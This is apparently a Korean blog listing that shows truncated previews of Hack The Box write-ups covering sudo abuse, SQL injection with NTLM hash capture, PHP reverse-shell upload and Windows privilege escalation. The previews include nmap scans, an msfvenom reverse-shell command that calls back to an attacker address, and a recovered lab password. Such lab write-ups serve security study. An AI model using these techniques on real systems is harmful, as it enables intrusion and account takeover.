Solo의 정보보안 해킹하기

UnderpassOS: Linux취약점: 취약한 Sudo 권한 설정 Mosh는 SSH 같이 원격 접속 기능을 제공하는 서버다. Sudo 권한으로 Mosh 서버를 실행하고 Mosh 서버가 생성한 터미널에 접속해 루트쉘을 획득할 수 있다. SudosvcMosh@underpass:~$ sudo -lMatching Defaults entries for svcMosh on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser svcMosh may run the following commands on localh..

UnderpassOS: Linux취약점: SNMP 기본 커뮤니티 스트링과 daloradius 기본 계정 정보 SNMP 프로토콜을 통해 웹서버에 대한 정보를 수집할 수 있다. 수집한 정보를 사용해 Daloradius 웹 매니지먼트 어플리케이션을 발견하고 Daloradius 기본 계정 비밀번호를 사용해 관리자 계정으로 로그인 할 수 있다. 관리자 계정에 접속해 Daloradius 회원 정보를 수집할 수 있고 해당 정보를 사용해 SSH로 타겟 머신에 접속할 수 있다. 포트 스캐닝nmap -Pn -sS -p- -oN ./SYN_SCAN 10.129.231.213PORT STATE SERVICE22/tcp open ssh80/tcp open httpnmap -Pn -sU -p- -oN ./UDP_SCAN ..

Giddy OS: Windows취약점: 취약한 서비스 권한 설정과 PowerShell 히스토리 파일 PowerShell 히스토리 파일에 기록된 정보를 기반으로 서비스를 조작해 악성 파일을 실행할 수 있다. 리버스쉘원할한 작업을 위해서 Evil-WinRM 세션에서 새로운 리버스쉘을 업로드 하자. msfvenom을 사용해서 윈도우용 TCP 기반 리버스쉘을 제작할 수 있다.┌─[✗]─[solo@parrot]─[~/Desktop/hack]└──╼ $msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.108 LPORT=8000 -f exe -o reverse.exe*Evil-WinRM* PS C:\Users\Stacy\Documents> Invoke-WebReq..

GiddyOS: Windows취약점: SQL Injection, LLMNR Poisoning MS SQL Server를 데이터베이스로 사용하는 ASP.NET 기반 웹 어플리케이션이 돌아가는 머신이다. SQL Injection을 통해 MS SQL의 Stored Procedure인 xp_dirtree를 사용할 수 있다. xp_dirtree를 사용해 공격자에게 NTLM Hash를 전송하고 전송된 NTLM Hash를 크랙해 사용자 계정 비밀번호를 획득할 수 있다. 포트 스캐닝nmap -Pn -sS -p- -oN ./SYN_SCAN 10.10.10.104PORT     STATE SERVICE80/tcp   open  http443/tcp  open  https3389/tcp open  ms-wbt-server5..

DogOS: Linux취약점: 취약한 Sudo 설정 취약한 Sudo 권한으로 실행한 바이너리 파일이 리버스쉘을 생성하도록 유도해서 root 권한을 가진 쉘을 만들 수 있다. SSH┌─[✗]─[solo@parrot]─[~/Desktop/hack/note]└──╼ $ssh johncusack@10.10.11.58SSH로 johncusack 계정으로 로그인한다. SSH가 리버스쉘보다 안정적인 연결을 제공하기 때문에 작업하기 훨씬 수월하다. SSH로 성공적으로 로그인 했으면 사용자의 Sudo 권한을 확인해 보자. johncusack@dog:~$ sudo -l[sudo] password for johncusack: BackDropJ2024DS2024Matching Defaults entries for johncu..

DogOS: Linux취약점: Arbitrary File Upload, Git Repository 노출 노출된 Git 리포지토리를 통해 Backdrop CMS 관리자 계정을 탈취할 수 있고, 해당 계정으로 PHP 리버스쉘을 업로드해서 접근할 수 있다. 포트 스캐닝nmap -Pn -sS -p- 10.10.11.58PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpnmap -Pn -sC -sV -p 22,80 10.10.11.58PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072..

QuerierOS: Windows취약점: SeImpersonatePrivilege   mssql-svc 계정이 가지고 있는 취약한 권한을 활용해 System 계정으로 리버스쉘을 생성할 수 있다. 시스템 정보 확인 PS C:\Windows\system32> systeminfoHost Name:                 QUERIEROS Name:                   Microsoft Windows Server 2019 StandardOS Version:                10.0.17763 N/A Build 17763OS Manufacturer:           Microsoft CorporationOS Configuration:          Member ServerOS Bu..

QuerierOS: Windows취약점: SMB 공유 풀더를 통한 민감 정보 유출 SMB 공유 풀더에 접근해서 파일을 다운로드하고 해당 파일의 vbascript에서 탈취한 계정으로 MS SQL Server를 조작해 리버스쉘을 획득해야 하는 머신이다. 포트 스캐닝nmap -Pn -sS --min-rate 1000 --max-retries 3 -p- -oN ./SYN_SCAN 10.10.10.125PORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds1433/tcp open ms-sql-s5985/tcp open wsman47001/tcp open winrm49664/tcp ..

NetmonOS: Windows취약점: 취약한 FTP 설정 취약한 FTP 서버와 PRTG 네트워크 모니터링 소프트웨어가 설치된 윈도우 머신이다. 기본적인 FTP 취약점에 대한 지식과 구글링을 통해 얻을 수 있는 PTRG 설치 디렉토리 구조에 대한 정보를 활용해서 공략할 수 있는 비교적 쉬운 난이도의 머신이다. 포트 스캐닝nmap -Pn -sS --min-rate 1000 --max-retries 3 -p- -oN ./SYN_SCAN 10.129.230.176PORT STATE SERVICE21/tcp open ftp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds59..

KnifeOS: Linux취약점: PHP 백도어, 취약한 Sudo 권한 설정 백도어가 있는 PHP 버전이 설치된 리눅스 머신이다.PHP 백도어를 활용해 타겟 머신에 접속하고 Sudo 권한으로 knife 바이너리를 통해 루트쉘을 얻어 공략할 수 있다. 포트 스캐닝 nmap -Pn -sS --min-rate 1000 --max-retries 3 -p- -oN ./SYN_SCAN 10.10.10.242PORT STATE SERVICE22/tcp open ssh80/tcp open httpnmap -Pn -sC -sV -p 22,80 -oN SERVICE_SCAN 10.10.10.242PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubun..